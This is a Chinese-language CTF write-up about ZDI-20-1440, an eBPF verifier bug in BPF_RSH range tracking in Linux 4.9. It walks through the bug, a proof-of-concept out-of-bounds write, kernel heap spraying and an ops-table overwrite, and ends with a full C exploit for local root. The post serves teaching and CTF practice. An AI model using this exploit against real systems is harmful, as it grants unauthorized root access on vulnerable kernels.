ZDI-20-1440 Writeup - HexRabbit's Blog

我把自己的第一個 1day exploit 出成題目了，因為好像有點紀念價值就隨筆寫一下，如果有錯誤或缺漏的部分還請各位鞭小力點，本題是我出給今年 AIS3 EOF CTF final 的題目 Day One，可惜的是因為比賽時間過短沒有人在賽中解出來QQ

題目簡介

利用的漏洞出自於 ZDI-20-1440，這是由 TokyoWesterns 成員同時目前也任職於 Flatt Security 的 Ryota Shiga (@Ga_ryo_) 找到的一個位於 extended Berkeley Packet Filter (eBPF) verifier 的 verification bypass，透過利用該漏洞最終可以完成本地提權。(很可惜的是)由於該漏洞只存在 linux 的長期維護版本 (4.9 - 4.13) 中，目前只有 Debian 9 受到影響，且觸發條件要求了一個相對高權限的 CAP_SYS_ADMIN

但是這不影響我把它拿來出成一道題目，所以接下來就讓我們分析要如何運用吧 :)

初見

題目與尋常的 kernel pwnable 基本上一樣，提供了 bzImage/rootfs.cpio.gz/run.sh 中提供給參賽者，唯一的差別是多給了一個 patch.diff，這只是讓我在設計題目上能夠比較方便，所以將前述的 CAP_SYS_ADMIN 去除掉讓一般使用者也能夠觸發 bug，當然我也有注意不讓使用者透過 print_bpf_insn 印出的 debug 資訊 leak kernel address

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 335c002..08dca71 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -352,7 +352,7 @@ static void print_bpf_insn(const struct bpf_verifier_env *env,
 			u64 imm = ((u64)(insn + 1)->imm << 32) | (u32)insn->imm;
 			bool map_ptr = insn->src_reg == BPF_PSEUDO_MAP_FD;
 
-			if (map_ptr && !env->allow_ptr_leaks)
+			if (map_ptr && !capable(CAP_SYS_ADMIN))
 				imm = 0;
 
 			verbose("(%02x) r%d = 0x%llx\n", insn->code,
@@ -3627,7 +3627,7 @@ int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
 	if (ret < 0)
 		goto skip_full_check;
 
-	env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);
+	env->allow_ptr_leaks = true;
 
 	ret = do_check(env);
 
@@ -3731,7 +3731,7 @@ int bpf_analyzer(struct bpf_prog *prog, const struct bpf_ext_analyzer_ops *ops,
 	if (ret < 0)
 		goto skip_full_check;
 
-	env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);
+	env->allow_ptr_leaks = true;
 
 	ret = do_check(env);

除了小小的 kernel patch 以外，提供的 bzImage 裡就是一個 4.9.249 版號、開啟 BPF syscall 及預設 eBPF JIT 的 linux kernel

extended Berkeley Packet Filter (eBPF)

在開始談 ZDI-20-1440 這個漏洞之前，讀者需要先對 eBPF 有些先備知識，因為我也不是這方面的專家，在這裡推薦還不太熟的讀者參考以下幾篇不錯的文章:

Linux 核心設計: 透過 eBPF 觀察作業系統行為
- 由 jserv 老師開設的「Linux 核心設計」課程教材，對於其歷史與設計概念有著詳盡的介紹，十分推薦一讀
BPF: A New Type of Software
- Brendan Gregg 作為 kernel and performance engineer 任職於 Netflix，他相當擅長於 kernel 層級的效能優化，是 BPF 早期的 promoter 同時他也是 BPF Performance Tools 一書的作者
CVE-2020-8835: LINUX KERNEL PRIVILEGE ESCALATION VIA IMPROPER EBPF PROGRAM VERIFICATION
- Manfred Paul (@_manfp) 撰寫的 writeup，他利用該漏洞在 Pwn2Own 2020 上成功於 linux 上以一般使用者身份提權拿到 root shell

總的來說，讀者可以把 eBPF 想成一個執行在 kernel 中的小程式，有著自己的 bytecode 語法和對應的 interpreter，且會在 user 指定的位置被 kernel 解析並執行，常見的應用像是 seccomp、tcpdump、bpftrace 便是利用 eBPF 在 kernel 中插入「探針」將資訊解析並傳回 userland。

因為這支小程式會在 kernel 中執行，此時效能考量就變得相當重要，所以 linux kernel 為其內建了一個 JIT (Just-In-Time) compiler 用來消除 interpreter 轉譯和執行的 overhead，但很明顯的若是使用者插入了錯誤或惡意的 code 則極有可能導致 kernel panic 或甚至是達到 EoP (Escalation-of-Privilege)，為了避免這種情形 kernel 在載入 BPF program 時會先經過兩次檢查:

check_cfg() 會確保 BPF program 中不包含任何迴圈
do_check() 則是檢查是否存在錯誤的指令，並透過型別以及紀錄變數的數值範圍來保證程式不會有越界存取

漏洞成因

回到本題的漏洞上，如上述提到的 BPF verifier 為了確保指令不可能越界存取，會去記錄每個 register (這裡是指 BPF 裡定義的 register) 的可能的數值範圍，有了這個先備知識後 ZDI-20-1440 的成因就相當容易瞭解了，以下是在 kernel/bpf/verifier.c 中有問題的原始碼:

    // ...
    case BPF_RSH: 
/* RSH by a negative number is undefined, and the BPF_RSH is an 
 * unsigned shift, so make the appropriate casts. 
 */ 
        if (min_val < 0 || dst_reg->min_value < 0) 
            dst_reg->min_value = BPF_REGISTER_MIN_RANGE; 
        else 
            dst_reg->min_value = (u64)(dst_reg->min_value) >> min_val;  // <-- (3) 
        if (dst_reg->max_value != BPF_REGISTER_MAX_RANGE) 
            dst_reg->max_value >>= max_val;   // <-- (4) 
        break; 
    // ...

BPF_RSH 是一個 BPF instruction，基本上操作可以等價於以下的 pseudocode

dst_reg >>= src_reg

問題就出在 verifier 更新 register 的可能的數值範圍時有邏輯上的錯誤(3,4)，正常情況下 X >>= Y 後，X.max_val 應該要被更新為 X.max_val >> Y.min_val，同理 X.min_val 應該要更新為 X.min_val >> Y.max_val，但這裡的錯誤的寫成了 X.max_val >> Y.max_val、X.min_val >> Y.min_val 直接導致了 verifier 其後做的邊界檢查可以被輕鬆繞過(5)

static int do_check(struct bpf_verifier_env *env) 
{ 
// ... 
        } else if (class == BPF_STX) { 
            /* check that memory (dst_reg + off) is writeable */ 
            err = check_mem_access(env, insn_idx, insn->dst_reg, insn->off, 
                           BPF_SIZE(insn->code), BPF_WRITE, 
                           insn->src_reg);   <-- (5) 
// ... 
}

可以發現這個漏洞與某些 Javascript JIT compiler 上的漏洞非常相似，都是在進行邊界檢查的時候以不正確的邏輯對輸入做驗證，使得 optimizer/verifier 拿到錯誤的資訊最終導致檢查被繞過，真是簡單暴力

(不過其實就算不開啟 CONFIG_BPF_JIT 也可以觸發這個 bug，因為在檢查過後 interpreter 不會在執行時另外做邊界檢查)

PoC

ZDI blog 內文中基本上已經詳細給出能夠 trigger bug 的 PoC 了，利用流程如下:

首先註冊兩個 bpf map，接著從註冊好的 map 中把我們傳入的參數放到 BPF_REG_8 和 BPF_REG_9 上，這是接著要用於騙過 verifier 的數值，並且將 BPF_REG_0 設為 map2 array 的地址

bpf map 裡面有個可以自訂元素大小和個數的 array，使用者透過 bpf_create_map() 向 kernel 註冊後便可以對其讀取和寫入，作為 userland 和 bpf program 溝通的橋樑

// put the address of bpf array to BPF_REG_0
#define BPF_GET_MAP(fd, idx) \ 
        BPF_LD_MAP_FD(BPF_REG_1, fd), \ 
        BPF_MOV64_IMM(BPF_REG_2, idx), \ 
        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_2, -4),  \ 
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ 
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \ 
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ 
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \ 
        BPF_EXIT_INSN(), 

BPF_GET_MAP(map1_fd, 1) 
BPF_LDX_MEM(BPF_W, BPF_REG_8, BPF_REG_0, 0), 
 
BPF_GET_MAP(map1_fd, 2) 
BPF_LDX_MEM(BPF_W, BPF_REG_9, BPF_REG_0, 0), 
 
BPF_GET_MAP(map2_fd, 0)

再來利用 jmp 系列指令，控制讓 verifier 認為 0 ≤ BPF_REG_8 < 4096、0 ≤ BPF_REG_9 < 1024

BPF_JMP_IMM(BPF_JGE, BPF_REG_8, 0, 1), 
BPF_JMP_IMM(BPF_JA, 0, 0, 9), // jmp to exit
BPF_JMP_IMM(BPF_JGE, BPF_REG_8, 0x1000, 8), 
 
BPF_JMP_IMM(BPF_JGE, BPF_REG_9, 0, 1), 
BPF_JMP_IMM(BPF_JA, 0, 0, 5), // jmp to exit
BPF_JMP_IMM(BPF_JGE, BPF_REG_9, 1024, 4),

由於存在前面討論到的問題，此時 verifier 會認為 0 ≤ BPF_REG_8 ≤ 0 也就是 BPF_REG_8 = 0，所以我們便可以 bypass 檢查對 *(map2 + (BPF_REG_8 >> BPF_REG_9)) 越界寫入 0xdeadbeef，當然除了越界寫，同樣的越界讀也是可以的

BPF_ALU64_REG(BPF_RSH, BPF_REG_8, BPF_REG_9), // r8 >>= r9
BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8), // r0 += r8 
BPF_MOV64_IMM(BPF_REG_1, 0xdeadbeef),         // r1 = 0xdeadbeef
BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0), // *(r0) = r1
BPF_MOV64_IMM(BPF_REG_0, 0), 
BPF_EXIT_INSN(),

Exploit

exploit 的部分在出題時一開始只開 smep，結果後來發現似乎 smap 也可以利用，於是就寫了兩個版本:

+smep

稍微觀察一下 kernel 內一些操作 bpf_map 結構的 function 就可以發現到 bpf_map 是存在於一個更大的結構 bpf_array 當中

static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
    struct bpf_array *array = container_of(map, struct bpf_array, map); // <-- 注意到 container_of 這個 macro
    u32 index = *(u32 *)key;
    ...
}

繼續觀察便可以得知 bpf_array.value 就是存放 array value 的記憶體區域

struct bpf_array {
    struct bpf_map map;
    u32 elem_size;
    u32 index_mask;
    /* 'ownership' of prog_array is claimed by the first program that
     * is going to use this map or by the first program which FD is stored
     * in the map to make sure that all callers and callees have the same
     * prog_type and JITed flag
     */
    enum bpf_prog_type owner_prog_type;
    bool owner_jited;
    union {
        char value[0] __aligned(8);
        void *ptrs[0] __aligned(8);
        void __percpu *pptrs[0] __aligned(8);
    };
};

那既然我們有辦法做到對這個 array 加上任意 offset 進行讀寫的話，bpf_array 上的元素都是可能可以被利用的 target，於是繼續追看看有什麼是容易被利用的

struct bpf_map {
    /* 1st cacheline with read-mostly members of which some
     * are also accessed in fast-path (e.g. ops, max_entries).
     */
    const struct bpf_map_ops *ops ____cacheline_aligned; // <--
    enum bpf_map_type map_type;
    u32 key_size;
    u32 value_size;
    u32 max_entries;
    u32 map_flags;
    u32 pages;
    bool unpriv_array;
    /* 7 bytes hole */

    /* 2nd cacheline with misc members to avoid false sharing
     * particularly with refcounting.
     */
    struct user_struct *user ____cacheline_aligned;
    atomic_t refcnt;
    atomic_t usercnt;
    struct work_struct work;
};

最終發現 bpf_map.ops 預設會指向一個 function table array_ops，這也剛好是一個預設被 linux kernel export 的 symbol，也就是只需要把這個 function table 的位置寫掉換成我們可控的位置就可以輕鬆控到 RIP

static const struct bpf_map_ops array_ops = {
	.map_alloc = array_map_alloc,
	.map_free = array_map_free,
	.map_get_next_key = array_map_get_next_key,
	.map_lookup_elem = array_map_lookup_elem,
	.map_update_elem = array_map_update_elem,
	.map_delete_elem = array_map_delete_elem,
};

而且因為只開 smep 的緣故 function table 的地址可以直接填上在 userland 的 array，完全不需要 leak kernel heap address，再來透過 syscall 觸發執行我們偽造的 function，可以串上常用的 xchg eax, esp gadget 把 stack pivot 到 userland 做 ROP 便可以拿到 root shell

這部分的 exploit 由於篇幅關係就不放上來了，有興趣的可以到我的 github 看

+smap

開啟 smap 之後便不能將偽造的 function table 放在 userland，而是必須要放在 kernel heap 上，不過因為 bpf map 中的內容可控，這對我們來說也只是小菜一碟，唯一需要額外做的事只是 leak kernel heap address 而已

用 gdb 接上 qemu 觀察很容易就可以辨識出在 struct bpf_map 當中有存放 heap address

Breakpoint 1, 0xffffffff8112b850 in array_map_update_elem ()
gef➤  x/20gx $rdi
0xffff88000e320a00:     0xffffffff81a12100      0x0000000400000002
0xffff88000e320a10:     0x0000000100000100      0x0000000100000000
0xffff88000e320a20:     0x0000000000000001      0x0000000000000000
0xffff88000e320a30:     0x0000000000000000      0x0000000000000000
0xffff88000e320a40:     0xffff88000e2aca80      0x0000000100000002
0xffff88000e320a50:     0x0000000000000000      0x0000000000000000
0xffff88000e320a60:     0x0000000000000000      0x0000000000000000
0xffff88000e320a70:     0x0000000000000000      0x0000000000000000
0xffff88000e320a80:     0x0000000000000100      0x0000000000000000
0xffff88000e320a90:     0x0000000000000000      0x0000000000000000

但很可惜的是它指向存放其他 size chunk 的 page，由於 kernel heap randomization，我們無法從該 pointer 反推到目前可控的這個 page 的 address，不過實際上也不難，只要想辦法拿到在同一個 page 下的 free chunk 上的 fd pointer 就可以了

為了確保 exploit 在 leak kernel heap 的穩定性，我的做法是先利用 struct msg_msg 做 heap spray，讓 exploit 最開始透過 bpf_create_map() allocate 兩個 bpf map (更準確來說是 struct bpf_array) 時，總是會分配到幾乎未被使用過的 page 上，這樣便可以穩定地從後方 free chunk 上的 fd pointer leak 出同一個 page 下的地址

有了 heap address 就可以在 bpf map 上偽造 function table 了，但問題是我們該跳哪些 function 呢？

因為執行這些 function 時 rdi 會指向 struct bpf_map，我的想法是透過控制一些參數，直接利用原本就是操作 bpf map 的 function 去達成任意寫

我的第一個想法是既然我們都可以複寫整個 struct bpf_array 的內容了，那就利用像是 array_map_update_elem 中的 memcpy，只要控制好 array->elem_size 跟 index 不就可以寫到任意地址上了嗎？

/* Called from syscall or from eBPF program */
static int array_map_update_elem(struct bpf_map *map, void *key, void *value,
				 u64 map_flags)
            // ...

            memcpy(array->value +
                array->elem_size * (index & array->index_mask),
                value, map->value_size);

            // ...

結果寫完 exploit 我才發現原來大多數的 offset 都只有 int 的大小，不夠我偽造任意 kernel address…

接著又想到說，因為目標只是執行 commit_creds(prepare_kernel_cred(0))，如果可以先把某個 function 換成 prepare_kernel_cred 然後控制好 rdi = 0 並記錄下返回值，接下來只要重做一次並把 rdi 控制成剛剛的返回值就可以提權了吧？

但是在我尋尋覓覓之後，發現大多數 function 都是回傳 int，回傳指標的 function 通常也會在這之後對其進行操作，所以不能用；同時對 rdi 的控制雖然有 bpf_fd_array_map_update_elem 和 fd_array_map_delete_elem 兩個 function 可以利用，但執行後卻不會返回任何值，而且 rdi 還得要不為零才能觸發，所以肯定不能利用這兩個函數呼叫 prepare_kernel_cred(0)

static int fd_array_map_delete_elem(struct bpf_map *map, void *key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	void *old_ptr;
	u32 index = *(u32 *)key;

	if (index >= array->map.max_entries)
		return -E2BIG;

	old_ptr = xchg(array->ptrs + index, NULL); // 從 array 上拿取資料並置零，old_ptr 可控
	if (old_ptr) {
		map->ops->map_fd_put_ptr(old_ptr); // 若資料非零則呼叫 function table 上另一個 callback
		return 0;
	} else {
		return -ENOENT;
	}
}

看到這裡的時候，因為我一直不清楚 prepare_kernel_cred(0) 中的參數 0 是指什麼，想說若是有辦法繞過那至少有點機會 (雖然依舊拿不到 return 的 cred)，所以特別去翻了一下他的實作細節

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
    const struct cred *old;
    struct cred *new;

    new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    if (!new)
        return NULL;

    kdebug("prepare_kernel_cred() alloc %p", new);

    if (daemon)
        old = get_task_cred(daemon);
    else
        old = get_cred(&init_cred); // <----

    validate_creds(old);
    
    *new = *old;
    
    // ...
    
    return new;
    
    // ...
}

雖然看到傳入的參數是個指標時，心都涼了一半，但我很快地發現當參數傳入零的時候，他會透過 get_cred(&init_cred) 去取得一個看上去應該有著極高權限的 cred，接著將他賦值給 new 後先做了一些操作，緊接著就在不遠處將其返回…!!!

讀者們讀到這應該也會發現，要提權其實只需要執行一次 function call: commit_creds(&init_cred) 即可 (我是第一次知道這件事XD)，於是最後我的 exploit 流程如下:

偽造 function table 並將 map->ops 指過去
在偽造的 function table 中
- 以 fd_array_map_delete_elem 換掉 map_delete_elem
- 以 commit_creds 換掉 map_fd_put_ptr
透過呼叫 bpf_update_elem() 把 &init_cred 放上 bpf map
呼叫 bpf_delete_elem() 提權
get root shell :)

公布一下沒人拿到的 flag: AIS3{jibun_no_1_day_exploit_de_root_shell_wo_shutoku_suru_no_ha_omoshiroi_peko_jan?}

最終的 exploit (完整的放在這裡 smap.c):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/types.h>
#include <sys/msg.h>
#include "bpf.h"

char buffer[64];
int sockets[2];
int ctrl_mapfd;
int vuln_mapfd;
size_t ctrlmap_ptr;
size_t vulnmap_ptr;
size_t leakbuf[0x100];
size_t ctrlbuf[0x100];
size_t kbase;
size_t pivot_esp;

struct message {
    long type;
    char text[0x800];
} msg;

void msg_alloc(int id, int size)
{
  if (msgsnd(id, (void *)&msg, size - 0x30, IPC_NOWAIT) < 0) {
    perror(strerror(errno));
    exit(1);
  }
}

void heap_spray()
{
  int msqid;
  msg.type = 1;

  if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) < 0) {
    perror(strerror(errno));
    exit(1);
  }

  for (int i = 0; i < 0x13; ++i) {
    msg_alloc(msqid, 0x200);
  }
}

void get_shell() {
  printf("[*] get shell\n");
  system("sh");
}

void update_elem_ctrl()
{
  int key = 0;
  if (bpf_update_elem(ctrl_mapfd, &key, ctrlbuf, 0)) {
    printf("bpf_update_elem failed '%s'\n", strerror(errno));
  }
}

void get_elem_ctrl()
{
  int key = 0;
  if (bpf_lookup_elem(ctrl_mapfd, &key, leakbuf)) {
    printf("bpf_lookup_elem failed '%s'\n", strerror(errno));
  }
}

void debugmsg(void)
{
  char buffer[64];
  ssize_t n = write(sockets[0], buffer, sizeof(buffer));

  if (n < 0) {
    perror("write");
    return;
  }
  if (n != sizeof(buffer))
    fprintf(stderr, "short write: %lu\n", n);
}

int load_prog()
{
  // make bpf_map alloc to new page, in order to leak heap pointer stablly
  heap_spray();

  // size == 0x100, useful to set data on bpfarray
  ctrl_mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1, 0);
  if (ctrl_mapfd < 0) {
    puts("failed to create map1");
    return -1;
  }

  // size*count should be the same as ctrl_map
  vuln_mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1, 0);
  if (vuln_mapfd < 0) {
    puts("failed to create map2");
    return -1;
  }

  // sizeof(struct bpf_array) == 0x200
  // offset of bpf_array.value == 0x90
  struct bpf_insn prog[] = {
    // DW == 8bytes
    BPF_GET_MAP(ctrl_mapfd, 0),
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, 0),
    BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0, 8),
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0x10),
    BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),

    BPF_ST_MEM(BPF_W, BPF_REG_0, 0, 0x41414141),
    BPF_ST_MEM(BPF_W, BPF_REG_0, 4, 0x41414141),

    BPF_JMP_IMM(BPF_JGE, BPF_REG_8, 0, 1),
    BPF_JMP_IMM(BPF_JA, 0, 0, 9), // goto exit
    BPF_JMP_IMM(BPF_JGE, BPF_REG_8, 0x1000, 8),

    BPF_JMP_IMM(BPF_JGE, BPF_REG_9, 0, 1),
    BPF_JMP_IMM(BPF_JA, 0, 0, 6), // goto exit
    BPF_JMP_IMM(BPF_JGE, BPF_REG_9, 0x400, 5),

    BPF_ALU64_REG(BPF_RSH, BPF_REG_8, BPF_REG_9), // r8 >>= r9
    BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8), // r0 += r8

    // switch leak / write
    BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 4),

    // leak
    BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_0, 0), // r4 = *r0
    BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0x10), // *r6 = r4
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // write
    BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_6, 0), // *r0 = r6
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
  };
  return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog) / sizeof(struct bpf_insn), "GPL");
}

void infoleak()
{
  update_elem_ctrl();
  debugmsg();
  get_elem_ctrl();
  debugmsg();
}

void overwrite_array_ops() {
  int n = 0;
  int key = 0;
  size_t init_cred = kbase + 0xe43e60;
  size_t fd_array_map_delete_elem = kbase + 0x12b730;
  size_t commit_creds = kbase + 0x81e70;

  // prepare fake array_ops
  ctrlbuf[n++] = 0x170 * 2; // offset to bpf_array->map->ops
  ctrlbuf[n++] = 1;
  ctrlbuf[n++] = ctrlmap_ptr + 0x90 + 0x18; // ebpf code will overwrite bpf_array->map->ops with this ptr

  ctrlbuf[n++] = 0x4141414141414141;        // point to here
  ctrlbuf[n++] = 0x4241414141414141;
  ctrlbuf[n++] = 0x4341414141414141;
  ctrlbuf[n++] = 0x4441414141414141;
  ctrlbuf[n++] = 0x4541414141414141;
  ctrlbuf[n++] = 0x4641414141414141;
  ctrlbuf[n++] = fd_array_map_delete_elem;  // map_delete_elem
  ctrlbuf[n++] = 0x4841414141414141;
  ctrlbuf[n++] = commit_creds;              // map_fd_put_ptr

  // put elem on vuln_map
  bpf_update_elem(vuln_mapfd, &key, &init_cred, 0);
  debugmsg();

  // overwrite vulnmap->ops
  update_elem_ctrl();
  debugmsg();

  // fd_array_map_delete_elem call map->map_fd_put_ptr(first_elem) = commit_creds(&init_cred)
  bpf_delete_elem(vuln_mapfd, &key);
  debugmsg();

  get_shell();
}

int main() {
  int progfd = load_prog();

  if (progfd < 0) {
    printf("log:\n%s", bpf_log_buf);
    if (errno == EACCES)
      printf("failed to load prog '%s'\n", strerror(errno));
  }

  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
    strerror(errno);
    return 0;
  }

  if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
    strerror(errno);
    return 0;
  }

  ctrlbuf[0] = 0x170 * 2;
  ctrlbuf[1] = 1;
  infoleak();

  kbase = leakbuf[2] - 0xa12100;
  pivot_esp = kbase + 0x6ec938;
  printf("[+] leak kernel kbase: 0x%lx\n", kbase);

  ctrlbuf[0] = 0x570 * 2;
  ctrlbuf[1] = 1;
  infoleak();

  ctrlmap_ptr = leakbuf[2] - 0x800;
  vulnmap_ptr = ctrlmap_ptr + 0x200;
  printf("[+] leak kernel heap: 0x%lx\n", ctrlmap_ptr);

  overwrite_array_ops();
}